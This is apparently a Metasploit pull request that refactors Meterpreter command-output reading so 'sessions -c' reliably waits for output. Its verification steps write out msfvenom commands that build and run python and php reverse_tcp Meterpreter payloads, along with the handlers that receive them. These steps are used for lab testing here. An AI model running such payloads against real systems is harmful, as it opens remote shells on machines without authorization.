### PR TITLE
Fix #15097, fix unreliable sessions -c output

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -112,27 +112,7 @@ module Msf::Post::Common
 
       session.response_timeout = time_out
       process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true })
-      o = ""
-      # Wait up to time_out seconds for the first bytes to arrive
-      while (d = process.channel.read)
-        o << d
-        if d == ""
-          if Time.now.to_i - start < time_out
-            sleep 0.1
-          else
-            break
-          end
-        end
-      end
-      o.chomp! if o
-
-      begin
-        process.channel.close
-      rescue IOError => e
-        # Channel was already closed, but we got the cmd output, so let's soldier on.
-      end
-
-      process.close
+      o = process.read_data(start, time_out)
     when /powershell/
       if args.nil? || args.empty?
         o = session.shell_command("#{cmd}", time_out)

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -105,14 +105,12 @@ module Msf::Post::Common
       # through /bin/sh, solving all the pesky parsing troubles, without
       # affecting Windows.
       #
-      start = Time.now.to_i
       if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/
         args = ""
       end
 
       session.response_timeout = time_out
-      process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true })
-      o = process.read_data(start, time_out)
+      o = session.sys.process.capture_output(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true })
     when /powershell/
       if args.nil? || args.empty?
         o = session.shell_command("#{cmd}", time_out)

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1428,6 +1428,7 @@ class Core
               end
               c, c_args = cmd.split(' ', 2)
               begin
+                start = Time.now.to_i
                 process = session.sys.process.execute(c, c_args,
                   {
                     'Channelized' => true,
@@ -1435,7 +1436,7 @@ class Core
                     'Hidden'      => true
                   })
                 if process && process.channel
-                  data = process.channel.read
+                  data = process.read_data(start, response_timeout)
                   print_line(data) if data
                 end
               rescue ::Rex::Post::Meterpreter::RequestError

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1428,17 +1428,13 @@ class Core
               end
               c, c_args = cmd.split(' ', 2)
               begin
-                start = Time.now.to_i
-                process = session.sys.process.execute(c, c_args,
+                data = session.sys.process.capture_output(c, c_args,
                   {
                     'Channelized' => true,
                     'Subshell'    => true,
                     'Hidden'      => true
                   })
-                if process && process.channel
-                  data = process.read_data(start, response_timeout)
-                  print_line(data) if data
-                end
+                print_line(data) unless data.blank?
               rescue ::Rex::Post::Meterpreter::RequestError
                 print_error("Failed: #{$!.class} #{$!}")
               rescue Rex::TimeoutError

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -320,6 +320,35 @@ class Process < Rex::Post::Process
   end
 
   #
+  # Read data from the process channel
+  #
+  def read_data(time_out_start = 0, time_out = -1)
+    data = ""
+
+    # Wait up to time_out seconds for the first bytes to arrive
+    while (d = channel.read)
+      data << d
+      if d == ""
+        if Time.now.to_i - time_out_start < time_out
+          sleep 0.1
+        else
+          break
+        end
+      end
+    end
+    data.chomp! if data
+
+    begin
+      channel.close
+    rescue IOError => e
+      # Channel was already closed, but we got the cmd output, so let's soldier on.
+    end
+    close
+
+    return data
+  end
+
+  #
   # Closes the handle to the process that was opened.
   #
   def self.close(client, handle)

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -189,6 +189,37 @@ class Process < Rex::Post::Process
   end
 
   #
+  # Execute an application and capture the output
+  #
+  def Process.capture_output(path, arguments = nil, opts = nil, time_out = 15)
+    start = Time.now.to_i
+    process = execute(path, arguments, opts)
+    data = ""
+
+    # Wait up to time_out seconds for the first bytes to arrive
+    while (d = process.channel.read)
+      data << d
+      if d == ""
+        if Time.now.to_i - start < time_out
+          sleep 0.1
+        else
+          break
+        end
+      end
+    end
+    data.chomp! if data
+
+    begin
+      process.channel.close
+    rescue IOError => e
+      # Channel was already closed, but we got the cmd output, so let's soldier on.
+    end
+    process.close
+
+    return data
+  end
+
+  #
   # Kills one or more processes.
   #
   def Process.kill(*args)
@@ -317,35 +348,6 @@ class Process < Rex::Post::Process
   #
   def path
     return get_info()['path']
-  end
-
-  #
-  # Read data from the process channel
-  #
-  def read_data(time_out_start = 0, time_out = -1)
-    data = ""
-
-    # Wait up to time_out seconds for the first bytes to arrive
-    while (d = channel.read)
-      data << d
-      if d == ""
-        if Time.now.to_i - time_out_start < time_out
-          sleep 0.1
-        else
-          break
-        end
-      end
-    end
-    data.chomp! if data
-
-    begin
-      channel.close
-    rescue IOError => e
-      # Channel was already closed, but we got the cmd output, so let's soldier on.
-    end
-    close
-
-    return data
   end
 
   #


### PR DESCRIPTION
This change ensures `sessions -c` on meterpreter sessions behaves the same as cmd_exec, which means it will wait for the command output before displaying it.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a python and a php session
- [x] `handler -p python/meterpreter/reverse_tcp -H 192.168.13.37 -P 4444`
- [x] `./msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.13.37 LPORT=4444 -o met.py && python met.py`
- [x] `handler -p php/meterpreter/reverse_tcp -H 192.168.13.37 -P 4444`
- [x] `./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.13.37 LPORT=4444 -o met.php && php -f met.php`
- [x] **Verify** `sessions -c 'find /doesntexist'` always returns output
- [x] **Verify** `sessions -c 'echo start && sleep 1 && echo end'` always returns output
- [x] **Verify** the cmd_exec tests still pass, e.g:
```
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
run
```
